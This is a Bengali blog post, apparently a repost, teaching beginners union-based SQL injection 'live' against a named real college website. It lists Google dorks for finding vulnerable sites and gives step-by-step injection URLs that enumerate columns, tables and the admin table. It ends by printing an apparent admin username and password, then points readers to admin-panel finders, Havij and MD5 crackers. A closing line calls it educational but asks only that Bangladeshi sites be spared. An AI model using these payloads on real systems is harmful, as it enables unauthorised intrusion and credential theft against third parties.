আমি জানি যে আপনাদের অনেকেই এতো কঠিন প্রক্রিয়ায় ফ্রি নেট চালাতে পারবেন না। যারা পারবেন না তাদের মন খারাপ করার কারন নেই। আমার পরিক্ষা চলছে, আগামি ২৭ই নভেম্বর এ পরিক্ষা শেষ হবে। আমি পরিক্ষার আগে আর নেটে বসতে পারব না, তাই কোন কমেন্টের রিপ্লাই দিতে পারব না। সমস্যা নাই, আপনার সমস্যা কমেন্টে জানান, আমি ২৭ তারিখে সব রিপ্লাই দেব। তাছাড়া আমার https://www.facebook.com/akifmahmud.kingফেসবুক আইডিতে ফ্রেন্ড রিকোয়েস্ট পাঠান আর ওয়েট এবং দোয়া করেন!! ভালোয় ভালোয় পরিক্ষা শেষ হলেই আপনারা এক ক্লিকে ফ্রি নেট ইউজের সফট পেয়ে যাবেন। ধন্যবাদ।

Join in this Group :: http://www.facebook.com/groups/FreeNetUltimate

Email if you have trouble :: free_net_freedom@yahoo.com

আপনারা সমস্যা বলতে থাকেন, আমি আজ রাত ২ টা পরজন্ত নেটে আছি!!

And, Please Like this Page :: http://www.facebook.com/pctips20

SQL injection union based টিউটোরিয়াল ওয়েবসাইট লাইভ হ্যাকিং শিক্ষা

সূত্র : http://www.techtunes.com.bd/hacking/tune-id/247099

SQL injection union based  টিউটোরিয়াল ওয়েবসাইট লাইভ হ্যাকিং শিক্ষা ।

শুধু মাত্র নতুনদের জন্য অবিজ্ঞরা দূরে থাকুন ।

কোন সফটওয়্যার ছাড়া SQL INJECT করে আপনাদের ভার্নাবল সাইট লাইভ হ্যাক করা শিখাবো ।

প্রথমে SQL INJECT করার জন্য আমাদের ভার্নাবল সাইট খুজতে হবে।
এর জন্য আমরা dork  use করব !
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
এখানে  কিছু dork আছে sql ভার্নাবল সাইট খুজার জন্য !

8500 SQL dorks list
http://pastebin.com/dzknXjgP
or
http://pastebin.com/ayV6tNS2

প্রথমে যে কোন একটা dork নিয়ে আমি  http://www.google.com এ  SEARCH  দিব !

inurl:news-and-events.php?id=

এই উপরের  dork টি  দিয়া SEARCH দিয়ে আমি অনেক সাইট দেখলাম সেখান থেকে আমি একটা সাইট নিলাম ।
যেমন :
http://www.eastodissa.ac.in/news-and-events.php?id=22
ছবিঃ

প্রথমে SQL INJECT করার জন্য সাইটের ID ভেল্যু খুজতে হয় ।

এরপর আপনাকে দেখতে হবে সাইট টি injectable কিনা ।

এর জন্য আপনাকে url এর শেষে একটি ‘ বসাতে হবে ।
http://www.eastodissa.ac.in/news-and-events.php?id=22'

যদি ডাটাবেজের কিছু মিসিং আসে বা পেজের কিছু ইরর আসে তাহলে বুঝবেন সাইট টি injectable ।
যেমন : “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1″
ছবিঃ

এখন injectable সাইটে inject করার জন্য আপনাকে প্রথমে ডাটাবেজের কলাম বের করতে হবে ।

এখানে আমাদের ভার্নাবল সাইট

http://www.eastodissa.ac.in/news-and-events.php?id=22

আমাদের ডাটাবেজের কলাম বের করতে হলে প্রথমে  +order+by+ কমান্ড দিতে হবে ।

তাহলে লিংকটি দাড়ায়

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+

এখন + এর শেষে আপনাকে 1 থেকে শুরু করে ততক্ষণ পর্যন্ত চেষ্টা করতে হবে যতক্ষণ কোন  error না দেখায় ।

এখন প্রথমে  1 নিয়ে দেখি তাহলে লিংকটি দেখতে এমন হবে ।

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+1--

নাহ , তাহলে সাইটে কোনো ডাটা মিস করতেছে না ।

এখন আবার 2 দিয়ে চেষ্টা করি

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+2--
ছবিঃ

এবারও ডাটা মিস করতেছে না ।

এবাবে 3,4,5 করে 7 পর্যন্ত গেলাম ।

8 এ গেলে পুরো সাইট SQL ইরর দেখায় ।

অনেক সময় দেখা যাবে কোন সাইটে অর্থাৎ order by ১০০০ দিলেও কোন error দেখায় না ।
http://www.site.com/index.php?id=1 order ১০০০– [ no error ]

এক্ষেত্রে --  এর পর + এবং id=1 এর পর ‘ sign দিতে হবে ।

তাহলে সম্পূর্ণ লিঙ্কটি হবে

http://www.site.com/index.php?id=1′ order by ১০০০–+
এবার পেজে error দেখাবে ।
বাকি অংশগুলো সাধারন SQL Injection  এর মতই হবে ।)

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+8--
ছবিঃ

ইরর এরকমের হতে পারে ।

Could not connect to MySQL server: Unknown column ’8′ in ‘order clause’ ।

অর্থ্যাত্‍ এই সাইটের ডাটাবেজের কলাম 7 টি ।

এখন আমাদের দেখতে হবে এই 7 টা কলামের ভেতর ভার্নাবল কোনটি ।এর জন্য আমাদের আবার কমান্ড ব্যবহার করতে হবে ।

কমান্ড টি হবে এমন

+union+select+1,2,3,4,5,6,7--

তাহলে লিংক টি দাড়াবে

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,2,3,4,5,6,7--
ছবিঃ

( উল্লেখ , এখানে news-and-events.php?id= এর পর একটি -- দেয়া হয়েছে )

এখন আপনি ভার্নাবল কলাম দেখতে পাবেন ।

এই সাইটের ভার্নাবল কলাম 2,3,দেখাবে ।

এখানে আমরা 2 নম্বর কলাম নিয়ে কাজ করবো ।আপনার টার্গেট সাইট যা পাবেন তা নিয়ে কাজ করতে হবে।

এখন আমরা ভার্নাবল কলামের ভার্সন বের করবোঃ

এর জন্য আপনাকে আবার একটি কমান্ড ব্যবহার করতে হবে ।

এখন আগের লিংকে শুধু 2 এর জায়গায় @@version দিতে হবে ।

তাহলে আমার লিংক টি দাড়ায় এমন ।

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,@@version,3,4,5,6,7--
ছবিঃ

এই লিংকে গেলে আমরা ভার্সন দেখতে পাবো ।

এটার ভার্সন 5.1.68-community

ভার্সন 5 এর নিচে সাইট গুলো হবে না ভার্সন 5 এর নিচের সাইট এর জন্য অন্য ব্যবস্তা  আছে ।  তাহলে ঐ সাইট বাদ দিয়ে অন্যগুলো সাইট inject করতে চেষ্টা করবেন ।

এখন আমরা টেবিল বাহির করবঃ

এখন আমরা আরেকটি কমান্ড ব্যবহার করে টেবিল বের করব ।

এক্ষেত্রে ভার্নাবল কলামের বদলে group_concat(table_name) কমান্ড দিবো এবং শেষ কলামের পর

+from+information_schema.tables+where+table_schema=database()-- কমান্ড দিবো ।

তাহলে লিংকটি দাড়ালো
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--
লিংকে গেলে আপনি কিছু টেবিল দেখতে পাবেন
ছবিঃ

এই সাইটের টেবিল গুলো হল

est_achievement,est_admin,est_adminlog,est_companyrecord,est_facprofile,est_news,est_notice,est_onlineapplication,est_placementrecord

এখন এখান থেকে এডমিন টেবিল বের করতে হবে ।

এক্ষেত্রে আপনাকে একটু বুদ্বি  খাটাতে হবে ।যেমন এখানে est_achievement , est_companyrecord এর এডমিন টেবিল হবে না বুঝা যায় ।

একমাত্র est_admin এডমিন টেবিল মনে হয় ।

ধরে নিতে না পারলে বা ভুল ধরলে সমাস্যা নেই ।ধারনা না করতে পারলে একটা করে চেষ্টা করবেন।

কমান্ডের মাধ্যমে বের করতে হবে । এক্ষেত্রে আপনাকে group_concat(table_name) বদলে group_concat(column_name) কমান্ড দিতে হবে ।

এবং শেষ কলামের পর +from information_schema.columns where table_name=  এবং এর পর আপনার ধরে নেয়া এডমিন টেবিলের CHAR রুপান্তর দিতে হবে ।

এই লিংক থেকে এডঅন টি ডাউনলোড করে ইন্সটল করেন ফায়ারফক্স ব্রাউজার ।

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

এখন হ্যাকবার টি ওপেন করেন F9 চেপে

এবার SQL>MySQL>MySQL CHAR() ক্লিক করেন ।
ছবিঃ

নতুন একটা বক্স আসবেন সেখানে অ্যাডমিন টেবিল টি দিয়ে ok দিন ।
ছবিঃ

এখানে est_admin কে CHAR রুপান্তর করলে হয়  CHAR(101, 115, 116, 95, 97, 100, 109, 105, 110)

তাহলে লিংকটি দাড়ায়
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=CHAR(101, 115, 116, 95, 97, 100, 109, 105, 110)--

লিঙ্কটি দেখতে চাইলে কপি করে আপনার ব্রাউজার এ পেস্ট করেন।
ছবিঃ

আপনি এডমিন টেবিল ধারনা না করতে পারলে আপনি = এর পর অন্যান্য টেবিলের হেক্স রুপান্তর দিয়ে চেষ্টা করবেন ।

যেহেতু আমরা বুঝেছি est_admin  এডমিন টেবিল এর CHAR  রুপান্তর দিয়ে লিংকে গিয়ে আমরা পেলাম কিছু এডমিন কলাম ।
uid,userid,password,emailid,signature,last_login

এখন আমরা এডমিন কলাম থেকে সাইটে লগিনের জন্য ইউজারমেম আর পাসওয়ার্ড বের করবো ।
এজন্য আমাদের শেষ কমান্ড ব্যবহার করতে হবে ।

এজন্য আমাদের group_concat(column_name) বদলে group_concat(login,0x3a,Pass,0x3a) কমান্ড দিবো ।

যেহেতু আমরা এডমিন কলামে userId পেয়েছি । তাহ login এর বদলে কমান্ডে userId লিখবো । আপনি অন্য সাইটে অন্য কিছুও পেতে পারেন ।

কলাম হিসেবে আপনাকে কমান্ড করতে হবে ।

একৈ ভাবে কমান্ডে Pass  এর বদলে password ব্যবহার করতে হবে ।

এবং শেষ কলামের পর +from+est_admin-- বসাতে হবে ।

+from+ এর পর est_admin দিলাম কারন এখানে এডমিন টেবিল est_admin ।

তাহলে লিংক টি দাড়ায়

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,group_concat(userId,0x3a,password,0x3a),3,4,5,6,7+from+est_admin--
ছবিঃ

আমি  ইউজারনেম ও পাসওয়ার্ড পেয়ে গেলাম ।

এখানে ইউজারমেম পাসওয়ার্ড হচ্ছে trustadmin:isti$$9!5!2013:

ইউজারমেম trustadmin
পাসওয়ার্ড  isti$$9!5!2013

এখন শেষ কাজ হচ্ছে এডমিন পেনেল বের করা ।

এর জন্য আপনাকে কোনো সফ্টওয়ার বা এডমিন ফাইন্ডার সাইট ব্যবহার করতে হবে ।

যারা মোবাইল দিয়ে হ্যাকিং করেন তারা এডমিন প্যানেল খোজার জন্য এই সাইট টি ব্যবহার করতে পারেন

-http://scan.subhashdasyam.com/admin-panel-finder.php

আর যারা পিসি তে কাজ করবেন তারা havij ব্যবহার করবেন এডমিন প্যানেল খোজার জন্য

আর অনেক সফটওয়্যার আছে তা নিয়ে অন্য একদিন পোস্ট করব।

আর MD5 হ্যাশ ভাঙতে http://www.md5decrypter.cu.uk/ এটি ব্যবহার করবেন ।

তারপরেও বোজতে সমস্যা হলে নিচের ভিডিও টি দেখুন ।
http://www.youtube.com/watch?v=QuW_rSQ5_W0&feature=youtube_gdata_player

বিদ্রঃ পোস্টটি শুধু শিখার জন্য কার ক্ষতি করবেন না ।বাংলাদেশের কোন সাইট হ্যাক করবেন না।আপনার কোন সমস্যার জন্য লেখক  দায়ি থাকবে না ।